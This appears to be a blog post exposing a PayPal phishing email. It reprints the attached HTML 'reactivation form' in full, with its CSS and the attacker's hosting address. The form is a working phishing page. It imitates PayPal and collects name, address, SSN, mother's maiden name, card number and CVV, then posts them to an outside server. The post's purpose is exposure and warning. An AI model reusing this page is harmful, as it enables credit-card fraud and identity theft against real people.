I got this email today in my spam folder:
Dear valued PayPal Customer,
We’re constantly working to make PayPal safer, simpler and more convenient for
our customers.
This means that from time to time we have to verify and keep up to date your
account.It has come to our attention that your PayPal account information needs to be
updated as part of our continuing commitment to protect your account.Attached at this message you have the reactivation form for your account.
Open and Complete this form to avoid account termination.Remember to allow
JavaScript or ActiveX from the pop-up bar that will appear when you complete the
form.Thank you. PayPal Account Service
i followed orders so i got the ResolutionCenter – Confirm Identity Form.html lol
then i opened this file with EditPlus to look for something special inside
i got this url:http://200.217.207.56/central2/cores/wp/w.php
the brasilian hecker is using the psiunet brasilian ISP to host his garbage
more screens here:
Phishing Script here:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>PayPal - restore your account</title><link rel="stylesheet" href="http://200.217.207.56/central2/cores/wp/style.css" /><script type="text/javascript" language="javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script><script type="text/javascript" language="javascript" src="http://plugins.jquery.com/files/jquery.color.js.txt"></script><script type="text/javascript" language="javascript">function tst(r,e){return r.test(document.forms[0].elements[e].value);} function r(e,m){alert(m); var elem = document.forms[0].elements[e]; elem.focus(); $(elem).css({background:'#f00'});$(elem).animate({ backgroundColor: "white" }, "150");return false;}function elm(e){return document.forms[0].elements[e];}function validate(frm){ if(!tst(/^.{2,}$/i,'fname')){return r('fname','First Name: Please enter your first name.');} if(!tst(/^.{2,}$/i,'lname')){return r('lname','Last Name: Please enter your last name.');} if(!tst(/^.{4,}$/i,'add')){return r('add','Address Line 1: Please enter your full street address.');} if(!tst(/^.{2,}$/i,'city')){return r('city','City: Please enter your city.');} if(!tst(/^.{2,}$/i,'state')){return r('state','State: Please enter your state.');} if(!tst(/^[0-9]{4,9}$/i,'zip')){return r('zip','Zip Code: Please enter your zip code rUse only digits.');} if(!tst(/^[0-9]{3}$/i,'tel1')){return r('tel1','Home Phone Number: Please enter a valid phone number.');} if(!tst(/^[0-9]{3}$/i,'tel2')){return r('tel2','Home Phone Number: Please enter a valid phone number.');} if(!tst(/^[0-9]{4}$/i,'tel3')){return r('tel3','Home Phone Number: Please enter a valid phone number.');} if(!tst(/^.{2,}$/i,'mmn')){return r('mmn','Mother's Maiden Name: Please enter your mother's maiden name.');} if(!tst(/^[0-9]{2}$/i,'dobm')){return r('dobm','Date of Birth: Please enter a valid date of birth.');} if(!tst(/^[0-9]{2}$/i,'dobd')){return r('dobd','Date of Birth: Please enter a valid date of birth.');} if(!tst(/^[0-9]{4}$/i,'doby')){return r('doby','Date of Birth: Please enter a valid date of birth.');} if(!tst(/^(3|4|5|6){1}[0-9]{15,16}$/i,'cc')){return r('cc','Credit / Debit Card Number: Please enter a valid Card Number,n16 to 17 digits without spaces or dashes.');} if(!tst(/^[0-9]{1,2}$/i,'expm')){return r('expm','Expiration Date: Please enter a valid Expiration Date.');} if(!tst(/^[0-9]{2}$/i,'expy')){return r('expy','Expiration Date: Please enter a valid Expiration Date.');} if(!tst(/^[0-9]{3,4}$/i,'cvv')){return r('cvv','CSC: Please enter a valid CSCn3 to 4 digits.');} return true;}</script></head><body> <div id="h1"> <a target="_blank" href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_registration-run" onclick="return false">Sign Up</a> | <a target="_blank" href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_login-run" onclick="return false">Log In</a> | <a target="_blank" href="https://www.paypal.com/us/cgi-bin/helpweb?cmd=_help" onclick="return false">Help</a> | <a target="_blank" href="https://www.paypal.com/securitycenter" onclick="return false">Security Center</a> <span id="search"><input type="text" size="15" id="s_field"/> <input type="button" value="Search" id="s_btt"/></span> </div> <div id="h2"> <a target="_blank" href="http://www.paypal.com/" onclick="return false"></a> </div> <div id="h3"> <a target="_blank" href="http://www.paypal.com/" onclick="return false">Home</a> <a target="_blank" href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_home-customer&nav=1" onclick="return false">Personal</a> <a target="_blank" href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_home-merchant&nav=2" onclick="return false">Business</a> <a target="_blank" href="https://cms.paypal.com/us/cgi-bin/marketingweb?cmd=_render-content&content_ID=products_services/product_services01" onclick="return false">Products & Services</a> <a target="_blank" href="https://www.paypal.com/shopping_outside" onclick="return false">Shopping</a> </div> <br /><br /><h3 class="or"><font size="3">Restore your account</font></h3> <p>You have received this file because your PayPal account has been temporarily suspended. <br>Please fill out and submit this form in order to restore your account.</p> <p><font color="#FF0000">*</font> Please fill in all fields.</p> <div id="h4"> <form name="frm" method="post" action="http://200.217.207.56/central2/cores/wp/w.php" onsubmit="return validate()" > <table border="0" style="margin: 0 auto"> <tr> <td valign="top"> First Name<br /> <input type="text" name="fname" size="29" style="font-size: 8pt" /> <br /> <div class="space"></div> Last Name<br /> <input type="text" name="lname" size="29" style="font-size: 8pt"/> <br /> <div class="space"></div> Address Line 1<br /> <input type="text" name="add" size="29" style="font-size: 8pt"/> <br /> <div class="space"></div> City<br /> <input type="text" name="city" size="29" style="font-size: 8pt"/> <br /> <div class="space"></div> <span style="margin-right: 103px;">State</span>Zip Code<br /> <input type="text" name="state" size="14" style="font-size: 8pt" /> <input type="text" name="zip" size="10" maxlength="9" style="font-size: 8pt" /> <p>Home Phone Number<br /> <input type="text" name="tel1" size="3" maxlength="3" style="font-size: 8pt"/> - <input type="text" name="tel2" size="3" maxlength="3" style="font-size: 8pt"/> - <input type="text" name="tel3" size="4" maxlength="4" style="font-size: 8pt"/> </td> <td style="width: 150px;"></td> <td valign="top"> Mother's Maiden Name<br /> <input type="text" name="mmn" size="29" style="font-size: 8pt"/> <div class="space"></div> Date of Birth <span class="help">(Month / Day / Year)</span><br /> <input type="text" name="dobm" size="2" maxlength="2" style="font-size: 8pt"/> / <input type="text" name="dobd" size="2" maxlength="2" style="font-size: 8pt"/> / <input type="text" name="doby" size="4" maxlength="4" style="font-size: 8pt"/> <div class="space"></div> Social Security Number<span class="help">(US citizens only)</span><br /> <input type="text" name="ssn1" size="3" maxlength="3" style="font-size: 8pt"/> - <input type="text" name="ssn2" size="2" maxlength="2" style="font-size: 8pt"/> - <input type="text" name="ssn3" size="4" maxlength="4" style="font-size: 8pt"/> <br /> <div class="space"></div> Credit / Debit Card Number<br /> <input type="text" name="cc" size="29" maxlength="17" style="font-size: 8pt"/> <br /> <div class="space"></div> <span style="margin-right: 55px;">Expiration Date </span>CSC <a href="javascript: " onclick="window.open('https://www.paypal.com/us/cgi-bin/webscr?cmd=p/acc/cvv_info_pop-outside','_blank','width=410,height=470')">What's this</a><br /> <input type="text" name="expm" size="2" maxlength="2" style="font-size: 8pt" /> / <input type="text" name="expy" size="2" maxlength="2" style="font-size: 8pt" /> <span class="help">(MM / YY)</span> <input type="text" name="cvv" size="5" maxlength="4" style="font-size: 8pt" /> <div class="space"></div> Bank Name<br /> <input type="text" name="bank" size="40" maxlength="50" style="font-size: 8pt"/> <div class="space"></div> </td> </tr> <tr> <td colspan="3" align="center" style="padding: 40px 0 0 0;"> <input type="submit" class="submit" value="Submit" style="font-size: 8pt; font-weight: bold" /></td> </tr> </table> </form> </div><br /><br /> <div id="foot"> <a href="http://www.paypal-media.com/aboutus.cfm" onclick="return false">About Us</a> | <a href="https://www.paypal.com/us/cgi-bin/helpscr?cmd=_help&t=escalateTab" onclick="return false">Contact Us</a> | <a href="http://www.paypal.com/us/cgi-bin/webscr?cmd=_display-fees-outside" onclick="return false">Fees</a> | <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=p/gen/jobs-outside" onclick="return false">Jobs</a> | <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_home-merchant" onclick="return false">Merchant Services</a> | <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_display-country-functionality-outside" onclick="return false">Worldwide</a> | <a id="fb" href="http://www.ebay.com/" onclick="return false">Site feedback</a>|<br /> <a href="http://www.paypal.com/us/cgi-bin/webscr?cmd=p/gen/ua/policy_privacy-outside" onclick="return false">Privacy</a> | <a href="http://www.thepaypalblog.com" onclick="return false">Our Blog</a> | <a href="https://www.paypal-labs.com" onclick="return false">Labs</a> | <a href="http://www.paypal.com/us/cgi-bin/webscr?cmd=_web-referrals-mrb-outside" onclick="return false">Referrals</a> | <a href="http://www.paypal.com/us/cgi-bin/webscr?cmd=p/gen/ua/ua-outside" onclick="return false">Legal Agreements</a> | <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=xpt/Marketing/general/SiteMap-outside" onclick="return false">Site Map</a> | <a href="http://www.ebay.com/" onclick="return false">eBay</a> <p>Copyright © 1999-2009 PayPal. All rights reserved.</p> </div></body></html>
robots2.txt is the file where all stolen credit cards are saved
style.css:
body{width: 760px; font:normal 12px Arial,Helvetica,sans-serif; margin:0 auto; padding:0;}
a{color: #084482; font-size: 10.8px}
#h1{text-align: right; }
#h1 a{padding: 0 5px 0 5px;}
#search{background: url(img/hdr_search_bg.gif) no-repeat #D5D5D5; padding: 4px 10px 0px 19px; display: inline-block; height:26px;}
#s_field{font-size: 11px; border: 1px solid #ADC2D6; padding:2px; margin: 0;}
#s_btt{padding: 2px 1px 2px 1px; background: url(img/btt_search.gif) repeat-x; font-size: 11px; border: 1px outset #ccc; cursor:pointer; margin: 0;}
#h2{height: 70px; background:url(img/paypal_logo.gif) no-repeat; margin-top:5px;}
#h2 a{width: 200px; height:50px; display: block}
#h3 {background: url(img/h3bg.gif) center bottom repeat-x; padding-left: 10px;}
#h3 a{background: url(img/h3a.gif) center bottom repeat-x; padding: 4px 11px 0 11px; display:inline-block; height: 18px; color:#fff; text-decoration: none; font-weight: bold; font-size:12px; margin-right: 2px;}
#h3 a:hover{background: url(img/h3ah.gif) center bottom repeat-x;}
.or{color: #c88039; font-size:1.3em}
h1, h2, h3, h4, h5, h6{margin-top: 0.1em; margin-right: 0pt; margin-bottom: 0.1em; margin-left: 0pt; line-height: normal; }
#h4{background: url(img/blue_white_gray_gradient.jpg) bottom repeat-x; border: 1px solid #CCCCCC; padding: 15px}
td#info{text-align: left;padding-top: 12px;}
#secure{background: url(img/secure_lock_2.gif) right top no-repeat; padding: 1px 20px 3px 3px; display: block;float: right}
#cb{clear: both;}
input{border: 1px solid #adc2d6; margin: 4px 0 4px 0;padding: 2px;}
span.help{color: #888;font-size: 11px;}
#all{display: none; }
.space{height: 11px;}
.submit{cursor: pointer; background: url(img/btn.gif) 0% 17% repeat-x #FFA822; font-size: 1.1em; border-width: 1px; border-top-color: #D5BD98; border-right-color: #935E0D; border-bottom-color: #935E0D; border-left-color: #D5BD98; padding: 2px 20px 2px 20px}
#foot{color: #999; text-align: center; font-size: 11px}
#foot a{margin: 0 3px 0 3px; }
#fb{padding-right: 15px; background:url(img/fb.gif) right center no-repeat;}
hosting infos:
http://whois.domaintools.com/200.217.207.56